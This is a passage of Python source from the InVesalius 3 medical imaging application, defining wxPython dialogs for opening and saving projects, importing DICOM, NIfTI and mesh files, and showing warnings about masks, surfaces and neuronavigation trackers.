        icon = wx.ArtProvider.GetBitmap(wx.ART_WARNING, wx.ART_MESSAGE_BOX, (32,32))
        bmp = wx.StaticBitmap(self, -1, icon)
        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetDefault()
        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btn_sizer = wx.StdDialogButtonSizer()
        btn_sizer.AddButton(btn_ok)
        btn_sizer.AddButton(btn_cancel)
        btn_sizer.Realize()
        lbl_message_percent = wx.StaticText(self, -1,_("Percentage of original resolution"))
        # Percentage spinner bounded to 20-100% of the original resolution.
        num_ctrl_percent = InvSpinCtrl(self, -1, value=100, min_value=20, max_value=100)
        # NOTE: attribute name keeps the historical spelling ("porcent").
        self.num_ctrl_porcent = num_ctrl_percent
        sizer_percent = wx.BoxSizer(wx.HORIZONTAL)
        sizer_percent.Add(lbl_message_percent, 0, wx.EXPAND|wx.ALL, 5)
        sizer_percent.Add(num_ctrl_percent, 0, wx.ALL, 5)
        sizer_itens = wx.BoxSizer(wx.VERTICAL)
        sizer_itens.Add(lbl_message, 0, wx.EXPAND|wx.ALL, 5)
        sizer_itens.Add(sizer_percent, 0, wx.EXPAND|wx.ALL, 5)
        sizer_itens.Add(btn_sizer, 0, wx.EXPAND|wx.ALL, 5)
        sizer_general = wx.BoxSizer(wx.HORIZONTAL)
        sizer_general.Add(bmp, 0, wx.ALIGN_CENTRE|wx.ALL, 10)
        sizer_general.Add(sizer_itens, 0, wx.ALL , 5)
        #self.SetAutoLayout(True)
        self.SetSizer(sizer_general)
        sizer_general.Fit(self)
        self.Layout()
        self.Centre()
    def SetValue(self, value):
        """Set the percentage shown in the spinner."""
        self.num_ctrl_porcent.SetValue(value)
    def GetValue(self):
        """Return the chosen resolution percentage (20-100)."""
        return self.num_ctrl_porcent.GetValue()
    def Close(self):
        """Destroy the dialog window."""
        self.Destroy()
def ShowNumberDialog(message, value=0):
    """Prompt the user for a numeric value with a NumberDialog.

    Returns the entered value when the user confirms, 0 otherwise.
    """
    dlg = NumberDialog(message, value)
    dlg.SetValue(value)
    result = 0
    if dlg.ShowModal() == wx.ID_OK:
        result = dlg.GetValue()
    # Destroy on every path: the original returned before Destroy() when
    # OK was pressed, leaking the native dialog window.
    dlg.Destroy()
    return result
class ProgressDialog(object):
    """Thin wrapper around wx.ProgressDialog used while DICOM files load."""
    def __init__(self, parent, maximum, abort=False):
        # maximum: total number of progress steps.
        # abort=True adds a cancel button that publishes "Cancel DICOM load".
        self.title = "InVesalius 3"
        self.msg = _("Loading DICOM files")
        self.maximum = maximum
        self.current = 0
        self.style = wx.PD_APP_MODAL
        if abort:
            self.style = wx.PD_APP_MODAL | wx.PD_CAN_ABORT
        self.dlg = wx.ProgressDialog(self.title,
                                     self.msg,
                                     maximum = self.maximum,
                                     parent = parent,
                                     style  = self.style)
        self.dlg.Bind(wx.EVT_BUTTON, self.Cancel)
        self.dlg.SetSize(wx.Size(250,150))
    def Cancel(self, evt):
        """Notify listeners that the user aborted the DICOM load."""
        Publisher.sendMessage("Cancel DICOM load")
    def Update(self, value, message):
        """Advance the bar to *value*; returns False once the maximum is reached."""
        if(int(value) != self.maximum):
            try:
                return self.dlg.Update(value,message)
            #TODO:
            #Exception in the Windows XP 64 Bits with wxPython 2.8.10
            except(wx._core.PyAssertionError):
                return True
        else:
            return False
    def Close(self):
        """Destroy the underlying wx.ProgressDialog."""
        self.dlg.Destroy()
# ---------
# Filter indices within WILDCARD_INV_SAVE (uncompressed entry listed first).
INV_NON_COMPRESSED = 0
INV_COMPRESSED = 1
# Wildcard filter strings shared by the wx.FileDialog helpers below.
WILDCARD_INV_SAVE = _("InVesalius project (*.inv3)|*.inv3") + "|" + \
                    _("InVesalius project compressed (*.inv3)|*.inv3")
WILDCARD_OPEN = "InVesalius 3 project (*.inv3)|*.inv3|" \
                "All files (*.*)|*.*"
WILDCARD_ANALYZE = "Analyze 7.5 (*.hdr)|*.hdr|" \
                   "All files (*.*)|*.*"
WILDCARD_NIFTI = "NIfTI 1 (*.nii;*.nii.gz;*.hdr)|*.nii;*.nii.gz;*.hdr|" \
                 "All files (*.*)|*.*"
#".[jJ][pP][gG]"
WILDCARD_PARREC = "PAR/REC (*.par)|*.par|" \
                  "All files (*.*)|*.*"
WILDCARD_MESH_FILES = "STL File format (*.stl)|*.stl|" \
                      "Standard Polygon File Format (*.ply)|*.ply|" \
                      "Alias Wavefront Object (*.obj)|*.obj|" \
                      "VTK Polydata File Format (*.vtp)|*.vtp|" \
                      "All files (*.*)|*.*"
def ShowOpenProjectDialog():
    """Show a file picker for an .inv3 project; return the path or None.

    Remembers the chosen directory in the session and restores the
    process working directory afterwards (the dialog may chdir).
    """
    # Default system path
    current_dir = os.path.abspath(".")
    session = ses.Session()
    last_directory = session.get('paths', 'last_directory_inv3', '')
    dlg = wx.FileDialog(None, message=_("Open InVesalius 3 project..."),
                        defaultDir=last_directory,
                        defaultFile="", wildcard=WILDCARD_OPEN,
                        style=wx.FD_OPEN|wx.FD_CHANGE_DIR)
    # inv3 filter is default
    dlg.SetFilterIndex(0)
    # Show the dialog and retrieve the user response. If it is the OK response,
    # process the data.
    filepath = None
    try:
        if dlg.ShowModal() == wx.ID_OK:
            # This returns a Python list of files that were selected.
            filepath = dlg.GetPath()
    except(wx._core.PyAssertionError):  # FIX: win64
        filepath = dlg.GetPath()
    if filepath:
        session['paths']['last_directory_inv3'] = os.path.split(filepath)[0]
        session.WriteSessionFile()
    # Destroy the dialog. Don't do this until you are done with it!
    # BAD things can happen otherwise!
    dlg.Destroy()
    os.chdir(current_dir)
    return filepath
def ShowImportDirDialog(self):
    """Show a directory picker for a DICOM folder; return the path or None.

    On win32 the path is returned as str; elsewhere it is encoded to
    UTF-8 bytes (legacy behavior kept for existing callers).  The last
    used folder is stored in the session on non-darwin platforms.
    """
    current_dir = os.path.abspath(".")
    # Bind the session unconditionally: the original created it only on
    # win32/linux, which raised NameError on other non-darwin platforms
    # when SetLastDicomFolder was reached below.
    session = ses.Session()
    if sys.platform == 'win32' or sys.platform.startswith('linux'):
        folder = session.GetLastDicomFolder() or ''
    else:
        folder = ''
    dlg = wx.DirDialog(self, _("Choose a DICOM folder:"), folder,
                       style=wx.DD_DEFAULT_STYLE
                       | wx.DD_DIR_MUST_EXIST
                       | wx.DD_CHANGE_DIR)
    path = None
    try:
        if dlg.ShowModal() == wx.ID_OK:
            # GetPath returns unicode; non-win32 callers historically
            # receive UTF-8 bytes, so keep encoding there.
            if sys.platform == "win32":
                path = dlg.GetPath()
            else:
                path = dlg.GetPath().encode('utf-8')
    except(wx._core.PyAssertionError):  # TODO: error win64
        if (dlg.GetPath()):
            path = dlg.GetPath()
    if (sys.platform != 'darwin'):
        if (path):
            session.SetLastDicomFolder(path)
    # Only destroy a dialog after you're done with it.
    dlg.Destroy()
    os.chdir(current_dir)
    return path
def ShowImportBitmapDirDialog(self):
    """Directory picker for bitmap import (TIFF/BMP/JPG/PNG).

    Returns the chosen directory or None; remembers it in the session
    and restores the working directory afterwards.
    """
    previous_cwd = os.path.abspath(".")
    session = ses.Session()
    start_dir = session.get('paths', 'last_directory_bitmap', '')
    dialog = wx.DirDialog(self, _("Choose a folder with TIFF, BMP, JPG or PNG:"), start_dir,
                          style=wx.DD_DEFAULT_STYLE
                          | wx.DD_DIR_MUST_EXIST
                          | wx.DD_CHANGE_DIR)
    chosen = None
    try:
        if dialog.ShowModal() == wx.ID_OK:
            chosen = dialog.GetPath()
    except(wx._core.PyAssertionError):  # win64 workaround, as elsewhere in this module
        if dialog.GetPath():
            chosen = dialog.GetPath()
    if chosen:
        session['paths']['last_directory_bitmap'] = chosen
        session.WriteSessionFile()
    # Destroy only after all GetPath() calls are done.
    dialog.Destroy()
    os.chdir(previous_cwd)
    return chosen
def ShowImportOtherFilesDialog(id_type, msg='Import NIFTi 1 file'):
    """File picker for NIfTI/PAR-REC/Analyze import, keyed by *id_type*.

    The default wildcard/message targets NIfTI; PAR/REC and Analyze
    override them below.  Returns the selected path (str on win32,
    UTF-8 bytes elsewhere) or None on cancel.
    """
    # Default system path
    session = ses.Session()
    last_directory = session.get('paths', 'last_directory_%d' % id_type, '')
    dlg = wx.FileDialog(None, message=msg, defaultDir=last_directory,
                        defaultFile="", wildcard=WILDCARD_NIFTI,
                        style=wx.FD_OPEN | wx.FD_CHANGE_DIR)
    # if id_type == const.ID_NIFTI_IMPORT:
    #     dlg.SetMessage(_("Import NIFTi 1 file"))
    #     dlg.SetWildcard(WILDCARD_NIFTI)
    # elif id_type == const.ID_TREKKER_MASK:
    #     dlg.SetMessage(_("Import Trekker mask"))
    #     dlg.SetWildcard(WILDCARD_NIFTI)
    # elif id_type == const.ID_TREKKER_IMG:
    #     dlg.SetMessage(_("Import Trekker anatomical image"))
    #     dlg.SetWildcard(WILDCARD_NIFTI)
    # elif id_type == const.ID_TREKKER_FOD:
    #     dlg.SetMessage(_("Import Trekker FOD"))
    #     dlg.SetWildcard(WILDCARD_NIFTI)
    # elif id_type == const.ID_TREKKER_ACT:
    #     dlg.SetMessage(_("Import acantomical labels"))
    #     dlg.SetWildcard(WILDCARD_NIFTI)
    if id_type == const.ID_PARREC_IMPORT:
        dlg.SetMessage(_("Import PAR/REC file"))
        dlg.SetWildcard(WILDCARD_PARREC)
    elif id_type == const.ID_ANALYZE_IMPORT:
        dlg.SetMessage(_("Import Analyze 7.5 file"))
        dlg.SetWildcard(WILDCARD_ANALYZE)
    # inv3 filter is default
    dlg.SetFilterIndex(0)
    # Show the dialog and retrieve the user response. If it is the OK response,
    # process the data.
    filename = None
    try:
        if dlg.ShowModal() == wx.ID_OK:
            # GetPath returns in unicode, if a path has non-ascii characters a
            # UnicodeEncodeError is raised. To avoid this, path is encoded in utf-8
            if sys.platform == "win32":
                filename = dlg.GetPath()
            else:
                filename = dlg.GetPath().encode('utf-8')
    except(wx._core.PyAssertionError):  # TODO: error win64
        if (dlg.GetPath()):
            filename = dlg.GetPath()
    if filename:
        session['paths']['last_directory_%d' % id_type] = os.path.split(dlg.GetPath())[0]
        session.WriteSessionFile()
    # Destroy the dialog. Don't do this until you are done with it!
    # BAD things can happen otherwise!
    dlg.Destroy()
    return filename
def ShowImportMeshFilesDialog():
    """File picker for surface meshes (STL/PLY/OBJ/VTP); returns path or None.

    Remembers the chosen directory in the session and restores the
    working directory afterwards.
    """
    # Default system path
    current_dir = os.path.abspath(".")
    session = ses.Session()
    last_directory = session.get('paths', 'last_directory_surface_import', '')
    dlg = wx.FileDialog(None, message=_("Import surface file"),
                        defaultDir=last_directory,
                        wildcard=WILDCARD_MESH_FILES,
                        style=wx.FD_OPEN | wx.FD_CHANGE_DIR)
    # stl filter is default
    dlg.SetFilterIndex(0)
    # Show the dialog and retrieve the user response. If it is the OK response,
    # process the data.
    filename = None
    try:
        if dlg.ShowModal() == wx.ID_OK:
            filename = dlg.GetPath()
    except(wx._core.PyAssertionError):  # TODO: error win64
        if (dlg.GetPath()):
            filename = dlg.GetPath()
    if filename:
        session['paths']['last_directory_surface_import'] = os.path.split(filename)[0]
        session.WriteSessionFile()
    # Destroy the dialog. Don't do this until you are done with it!
    # BAD things can happen otherwise!
    dlg.Destroy()
    os.chdir(current_dir)
    return filename
def ImportMeshCoordSystem():
    """Ask whether the imported mesh was created by InVesalius.

    Returns False when the user answers yes, True otherwise.
    """
    msg = _("Was the imported mesh created by InVesalius?")
    # On macOS the text goes in the caption slot, as elsewhere in this module.
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", msg, wx.YES_NO)
    else:
        dialog = wx.MessageDialog(None, msg, "InVesalius 3", wx.YES_NO)
    answer = dialog.ShowModal()
    dialog.Destroy()
    return answer != wx.ID_YES
def ShowSaveAsProjectDialog(default_filename=None):
    """Ask where to save the current project.

    Returns (filename, compressed): filename is None on cancel;
    compressed is True when the compressed .inv3 filter was selected.
    """
    current_dir = os.path.abspath(".")
    session = ses.Session()
    last_directory = session.get('paths', 'last_directory_inv3', '')
    dlg = wx.FileDialog(None,
                        _("Save project as..."),  # title
                        last_directory,           # last used directory
                        default_filename,
                        WILDCARD_INV_SAVE,
                        wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT)
    #dlg.SetFilterIndex(0) # default is VTI
    filename = None
    try:
        if dlg.ShowModal() == wx.ID_OK:
            filename = dlg.GetPath()
            ok = 1
        else:
            ok = 0
    except(wx._core.PyAssertionError):  # TODO: fix win64
        filename = dlg.GetPath()
        ok = 1
    if (ok):
        # wx appends the extension natively on win32; add it manually elsewhere.
        extension = "inv3"
        if sys.platform != 'win32':
            if filename.split(".")[-1] != extension:
                filename = filename + "." + extension
    if filename:
        session['paths']['last_directory_inv3'] = os.path.split(filename)[0]
        session.WriteSessionFile()
    wildcard = dlg.GetFilterIndex()
    # Fix: the original never destroyed the dialog, leaking the native
    # window handle on every save.
    dlg.Destroy()
    os.chdir(current_dir)
    return filename, wildcard == INV_COMPRESSED
def ShowLoadSaveDialog(message=_(u"Load File"), current_dir=None, style=wx.FD_OPEN | wx.FD_CHANGE_DIR,
                       wildcard=_("Registration files (*.obr)|*.obr"), default_filename="", save_ext=None):
    """Generic open/save file dialog.

    message: dialog title; current_dir: directory restored after the
    dialog (defaults to the caller's cwd); style: wx.FileDialog flags;
    wildcard: filter string; default_filename: pre-filled name;
    save_ext: extension appended if missing (non-win32 only, since
    Windows appends it natively).  Returns the chosen path or None.
    """
    # Fix: evaluate the restore directory at call time.  The original
    # default (os.path.abspath(".")) was computed once at import, so the
    # dialog always chdir'ed back to the process-start directory instead
    # of the caller's current one.
    if current_dir is None:
        current_dir = os.path.abspath(".")
    dlg = wx.FileDialog(None, message=message, defaultDir="", defaultFile=default_filename,
                        wildcard=wildcard, style=style)
    # Show the dialog and retrieve the user response. If it is the OK response,
    # process the data.
    filepath = None
    try:
        if dlg.ShowModal() == wx.ID_OK:
            # This returns a Python list of files that were selected.
            filepath = dlg.GetPath()
            ok_press = 1
        else:
            ok_press = 0
    except(wx._core.PyAssertionError):  # FIX: win64
        filepath = dlg.GetPath()
        ok_press = 1
    # fix the extension if set different than expected
    if save_ext and ok_press:
        extension = save_ext
        if sys.platform != 'win32':
            if filepath.split(".")[-1] != extension:
                filepath = filepath + "." + extension
    # Destroy the dialog. Don't do this until you are done with it!
    # BAD things can happen otherwise!
    dlg.Destroy()
    os.chdir(current_dir)
    return filepath
class MessageDialog(wx.Dialog):
    """Modal dialog showing *message* with Yes/No/Cancel buttons."""
    def __init__(self, message):
        wx.Dialog.__init__(self, None, -1, "InVesalius 3", size=(360, 370), pos=wx.DefaultPosition,
                           style=wx.DEFAULT_DIALOG_STYLE|wx.ICON_INFORMATION)
        # Static text which contains message to user
        label = wx.StaticText(self, -1, message)
        # Buttons
        btn_yes = wx.Button(self, wx.ID_YES)
        btn_yes.SetHelpText("")
        btn_yes.SetDefault()
        btn_no = wx.Button(self, wx.ID_NO)
        btn_no.SetHelpText("")
        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btn_cancel.SetHelpText("")
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_yes)
        btnsizer.AddButton(btn_cancel)
        btnsizer.AddButton(btn_no)
        btnsizer.Realize()
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(label, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
        sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL|
                  wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 5)
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Centre()
class UpdateMessageDialog(wx.Dialog):
    """Yes/No dialog offering to open the download page for a new release.

    *url* is opened in the default browser when the user accepts.  The
    dialog also closes itself when the application publishes 'Exit'.
    """
    def __init__(self, url):
        msg=_("A new version of InVesalius is available. Do you want to open the download website now?")
        title=_("Invesalius Update")
        self.url = url
        wx.Dialog.__init__(self, None, -1, title, size=(360, 370), pos=wx.DefaultPosition,
                           style=wx.DEFAULT_DIALOG_STYLE|wx.ICON_INFORMATION)
        # Static text which contains message to user
        label = wx.StaticText(self, -1, msg)
        # Buttons
        btn_yes = wx.Button(self, wx.ID_YES)
        btn_yes.SetHelpText("")
        btn_yes.SetDefault()
        btn_no = wx.Button(self, wx.ID_NO)
        btn_no.SetHelpText("")
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_yes)
        btnsizer.AddButton(btn_no)
        btnsizer.Realize()
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(label, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
        sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL|
                  wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 5)
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Centre()
        btn_yes.Bind(wx.EVT_BUTTON, self._OnYes)
        btn_no.Bind(wx.EVT_BUTTON, self._OnNo)
        # Subscribing to the pubsub event which happens when InVesalius is
        # closed.
        Publisher.subscribe(self._OnCloseInV, 'Exit')
    def _OnYes(self, evt):
        # Launches the default browser with the url to download the new
        # InVesalius version.
        wx.LaunchDefaultBrowser(self.url)
        self.Close()
        self.Destroy()
    def _OnNo(self, evt):
        # Closes and destroy this dialog.
        self.Close()
        self.Destroy()
    def _OnCloseInV(self):
        # Closes and destroy this dialog.
        self.Close()
        self.Destroy()
class MessageBox(wx.Dialog):
    """Self-showing dialog with a title, a read-only text area and an OK button.

    NOTE(review): ShowModal is invoked from __init__ and the dialog is
    never destroyed here; callers appear to rely on garbage collection —
    confirm before changing.
    """
    def __init__(self, parent, title, message, caption="InVesalius3 Error"):
        wx.Dialog.__init__(self, parent, title=caption, style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER)
        title_label = wx.StaticText(self, -1, title)
        text = wx.TextCtrl(self, style=wx.TE_MULTILINE|wx.TE_READONLY|wx.BORDER_NONE)
        text.SetValue(message)
        text.SetBackgroundColour(wx.SystemSettings.GetColour(4))
        # Size the text area to roughly 30 characters wide.
        width, height = text.GetTextExtent("O"*30)
        text.SetMinSize((width, -1))
        btn_ok = wx.Button(self, wx.ID_OK)
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.Realize()
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(title_label, 0, wx.ALL | wx.EXPAND, 5)
        sizer.Add(text, 1, wx.ALL | wx.EXPAND, 5)
        sizer.Add(btnsizer, 0, wx.ALIGN_CENTER_VERTICAL|wx.EXPAND|wx.ALL, 5)
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Center()
        self.ShowModal()
class ErrorMessageBox(wx.Dialog):
    """Error dialog with an icon, title, read-only message area and OK button.

    NOTE(review): unlike MessageBox above, this one does NOT call
    ShowModal itself — the caller must show and destroy it.
    """
    def __init__(self, parent, title, message, caption="InVesalius3 Error"):
        wx.Dialog.__init__(self, parent, title=caption, style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER)
        title_label = wx.StaticText(self, -1, title)
        title_width, title_height = title_label.GetSize()
        # Scale the error icon with the title's text height.
        icon = wx.ArtProvider.GetBitmap(wx.ART_ERROR, wx.ART_MESSAGE_BOX, (title_height * 2, title_height * 2))
        bmp = wx.StaticBitmap(self, -1, icon)
        text = wx.TextCtrl(self, style=wx.TE_MULTILINE|wx.TE_READONLY|wx.BORDER_NONE)
        text.SetValue(message)
        text.SetBackgroundColour(wx.SystemSettings.GetColour(4))
        # Size the text area to roughly 60 characters wide.
        width, height = text.GetTextExtent("M"*60)
        text.SetMinSize((width, -1))
        btn_ok = wx.Button(self, wx.ID_OK)
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.Realize()
        title_sizer = wx.BoxSizer(wx.HORIZONTAL)
        title_sizer.Add(bmp, 0, wx.ALL | wx.EXPAND, 5)
        title_sizer.Add(title_label, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(title_sizer, 0, wx.ALL | wx.EXPAND, 5)
        sizer.Add(text, 1, wx.ALL | wx.EXPAND, 5)
        sizer.Add(btnsizer, 0, wx.EXPAND | wx.ALL, 5)
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Center()
def SaveChangesDialog__Old(filename):
    """Legacy save-changes prompt; returns 1 (yes), 0 (no) or -1 (cancel)."""
    prompt = MessageDialog(_("The project %s has been modified.\nSave changes?") % filename)
    answer = prompt.ShowModal()
    prompt.Destroy()
    if answer == wx.ID_YES:
        return 1
    if answer == wx.ID_NO:
        return 0
    return -1
def ImportEmptyDirectory(dirpath):
    """Inform the user that *dirpath* contains no importable files.

    NOTE(review): dirpath is decoded from UTF-8, so callers are expected
    to pass bytes; a str argument would raise AttributeError — confirm.
    """
    msg = _("%s is an empty folder.") % dirpath.decode("utf-8")
    if sys.platform == 'darwin':
        dlg = wx.MessageDialog(None, "",
                               msg,
                               wx.ICON_INFORMATION | wx.OK)
    else:
        dlg = wx.MessageDialog(None, msg,
                               "InVesalius 3",
                               wx.ICON_INFORMATION | wx.OK)
    dlg.ShowModal()
    dlg.Destroy()
def ImportOldFormatInvFile():
    """Warn that the project file comes from a newer InVesalius release."""
    warning = _("File was created in a newer InVesalius version. Some functionalities may not work correctly.")
    dialog = wx.MessageDialog(None, warning, "InVesalius 3",
                              wx.ICON_INFORMATION | wx.OK)
    dialog.ShowModal()
    dialog.Destroy()
def ImportInvalidFiles(ftype="DICOM"):
    """Tell the user that no importable files of type *ftype* were found."""
    if ftype == "Bitmap":
        message = _("There are no Bitmap, JPEG, PNG or TIFF files in the selected folder.")
    elif ftype == "DICOM":
        message = _("There are no DICOM files in the selected folder.")
    else:
        message = _("Invalid file.")
    flags = wx.ICON_INFORMATION | wx.OK
    # On macOS the text goes in the caption slot, as elsewhere in this module.
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", message, flags)
    else:
        dialog = wx.MessageDialog(None, message, "InVesalius 3", flags)
    dialog.ShowModal()
    dialog.Destroy()
def ImportAnalyzeWarning():
    """Warn about InVesalius' limited support for the Analyze format."""
    text = _("Warning! InVesalius has limited support to Analyze format.\n") + \
           _("Slices may be wrongly oriented and functions may not work properly.")
    flags = wx.ICON_INFORMATION | wx.OK
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", text, flags)
    else:
        dialog = wx.MessageDialog(None, text, "InVesalius 3", flags)
    dialog.ShowModal()
    dialog.Destroy()
def InexistentMask():
    """Warn the user that a mask must exist before creating a surface."""
    message = _("A mask is needed to create a surface.")
    flags = wx.ICON_INFORMATION | wx.OK
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", message, flags)
    else:
        dialog = wx.MessageDialog(None, message, "InVesalius 3", flags)
    dialog.ShowModal()
    dialog.Destroy()
def MaskSelectionRequiredForRemoval():
    """Tell the user that a mask must be selected before removal."""
    message = _("No mask was selected for removal.")
    flags = wx.ICON_INFORMATION | wx.OK
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", message, flags)
    else:
        dialog = wx.MessageDialog(None, message, "InVesalius 3", flags)
    dialog.ShowModal()
    dialog.Destroy()
def SurfaceSelectionRequiredForRemoval():
    """Tell the user that a surface must be selected before removal."""
    message = _("No surface was selected for removal.")
    flags = wx.ICON_INFORMATION | wx.OK
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", message, flags)
    else:
        dialog = wx.MessageDialog(None, message, "InVesalius 3", flags)
    dialog.ShowModal()
    dialog.Destroy()
def MeasureSelectionRequiredForRemoval():
    """Tell the user that a measure must be selected before removal."""
    message = _("No measure was selected for removal.")
    flags = wx.ICON_INFORMATION | wx.OK
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", message, flags)
    else:
        dialog = wx.MessageDialog(None, message, "InVesalius 3", flags)
    dialog.ShowModal()
    dialog.Destroy()
def MaskSelectionRequiredForDuplication():
    """Tell the user that a mask must be selected before duplication."""
    message = _("No mask was selected for duplication.")
    flags = wx.ICON_INFORMATION | wx.OK
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", message, flags)
    else:
        dialog = wx.MessageDialog(None, message, "InVesalius 3", flags)
    dialog.ShowModal()
    dialog.Destroy()
def SurfaceSelectionRequiredForDuplication():
    """Tell the user that a surface must be selected before duplication."""
    message = _("No surface was selected for duplication.")
    flags = wx.ICON_INFORMATION | wx.OK
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", message, flags)
    else:
        dialog = wx.MessageDialog(None, message, "InVesalius 3", flags)
    dialog.ShowModal()
    dialog.Destroy()
# Dialogs for neuronavigation mode
# ----------------------------------
def ShowNavigationTrackerWarning(trck_id, lib_mode):
    """
    Spatial Tracker connection error.

    trck_id selects the tracker's display name from the table below;
    lib_mode selects the failure message: 'choose' (nothing selected),
    'error' (driver not installed), 'disconnect' (lost connection), or
    anything else (not connected).
    """
    # Display names for every supported tracking device.
    trck = {const.SELECT: 'Tracker',
            const.MTC: 'Claron MicronTracker',
            const.FASTRAK: 'Polhemus FASTRAK',
            const.ISOTRAKII: 'Polhemus ISOTRAK',
            const.PATRIOT: 'Polhemus PATRIOT',
            const.CAMERA: 'CAMERA',
            const.POLARIS: 'NDI Polaris',
            const.POLARISP4: 'NDI Polaris P4',
            const.OPTITRACK: 'Optitrack',
            const.ROBOT: 'Robotic navigation',
            const.DEBUGTRACKRANDOM: 'Debug tracker device (random)',
            const.DEBUGTRACKAPPROACH: 'Debug tracker device (approach)'}
    if lib_mode == 'choose':
        msg = _('No tracking device selected')
    elif lib_mode == 'error':
        msg = trck[trck_id] + _(' is not installed.')
    elif lib_mode == 'disconnect':
        msg = trck[trck_id] + _(' disconnected.')
    else:
        msg = trck[trck_id] + _(' is not connected.')
    if sys.platform == 'darwin':
        dlg = wx.MessageDialog(None, "", msg,
                               wx.ICON_INFORMATION | wx.OK)
    else:
        dlg = wx.MessageDialog(None, msg, "InVesalius 3 - Neuronavigator",
                               wx.ICON_INFORMATION | wx.OK)
    dlg.ShowModal()
    dlg.Destroy()
def ICPcorregistration(fre):
    """Show the fiducial registration error *fre* and ask whether to refine.

    Returns True when the user chooses to improve accuracy.
    """
    question = _("The fiducial registration error is: ") + str(round(fre, 2)) + '\n\n' + \
               _("Would you like to improve accuracy?")
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", question, wx.YES_NO)
    else:
        dialog = wx.MessageDialog(None, question, "InVesalius 3", wx.YES_NO)
    wants_refine = dialog.ShowModal() == wx.ID_YES
    dialog.Destroy()
    return wants_refine
def ReportICPerror(prev_error, final_error):
    """Report the registration error before and after ICP refinement."""
    report = _("Error after refine: ") + str(round(final_error, 2)) + ' mm' + '\n\n' + \
             _("Previous error: ") + str(round(prev_error, 2)) + ' mm'
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", report, wx.OK)
    else:
        dialog = wx.MessageDialog(None, report, "InVesalius 3", wx.OK)
    dialog.ShowModal()
    dialog.Destroy()
def ShowEnterMarkerID(default):
    """Ask the user to edit a marker ID, pre-filled with *default*.

    Returns the entered text (the default if the dialog is dismissed).
    """
    prompt = _("Edit marker ID")
    if sys.platform == 'darwin':
        dialog = wx.TextEntryDialog(None, "", prompt, defaultValue=default)
    else:
        dialog = wx.TextEntryDialog(None, prompt, "InVesalius 3", value=default)
    dialog.ShowModal()
    entered = dialog.GetValue()
    dialog.Destroy()
    return entered
def ShowConfirmationDialog(msg=_('Proceed?')):
    """OK/Cancel confirmation dialog; returns the wx modal result code."""
    # msg = _("Do you want to delete all markers?")
    flags = wx.OK | wx.CANCEL | wx.ICON_QUESTION
    if sys.platform == 'darwin':
        dialog = wx.MessageDialog(None, "", msg, flags)
    else:
        dialog = wx.MessageDialog(None, msg, "InVesalius 3", flags)
    outcome = dialog.ShowModal()
    dialog.Destroy()
    return outcome
def ShowColorDialog(color_current):
    """Open a colour picker preset to *color_current*.

    Returns the chosen colour as an RGB tuple, or None on cancel.
    """
    data = wx.ColourData()
    data.SetColour(wx.Colour(color_current))
    dialog = wx.ColourDialog(None, data=data)
    dialog.GetColourData().SetChooseFull(True)
    selected = None
    if dialog.ShowModal() == wx.ID_OK:
        selected = dialog.GetColourData().GetColour().Get(includeAlpha=False)
    dialog.Destroy()
    return selected
# ----------------------------------
class NewMask(wx.Dialog):
    """Dialog for creating a new mask: name, threshold preset and range."""
    def __init__(self,
                 parent=None,
                 ID=-1,
                 title="InVesalius 3",
                 size=wx.DefaultSize,
                 pos=wx.DefaultPosition,
                 style=wx.DEFAULT_DIALOG_STYLE,
                 useMetal=False):
        # Local imports; presumably avoid a circular dependency at module
        # load time — TODO confirm.
        import invesalius.constants as const
        import invesalius.data.mask as mask
        import invesalius.project as prj
        wx.Dialog.__init__(self, parent, ID, title, pos, style=style)
        self.SetExtraStyle(wx.DIALOG_EX_CONTEXTHELP)
        self.CenterOnScreen()
        # This extra style can be set after the UI object has been created.
        if 'wxMac' in wx.PlatformInfo and useMetal:
            self.SetExtraStyle(wx.DIALOG_EX_METAL)
        self.CenterOnScreen()
        # LINE 1: Surface name
        label_mask = wx.StaticText(self, -1, _("New mask name:"))
        default_name = const.MASK_NAME_PATTERN %(mask.Mask.general_index+2)
        text = wx.TextCtrl(self, -1, "", size=(80,-1))
        text.SetHelpText(_("Name the mask to be created"))
        text.SetValue(default_name)
        self.text = text
        # LINE 2: Threshold of reference
        # Informative label
        label_thresh = wx.StaticText(self, -1, _("Threshold preset:"))
        # Retrieve existing masks
        project = prj.Project()
        thresh_list = sorted(project.threshold_modes.keys())
        default_index = thresh_list.index(_("Bone"))
        self.thresh_list = thresh_list
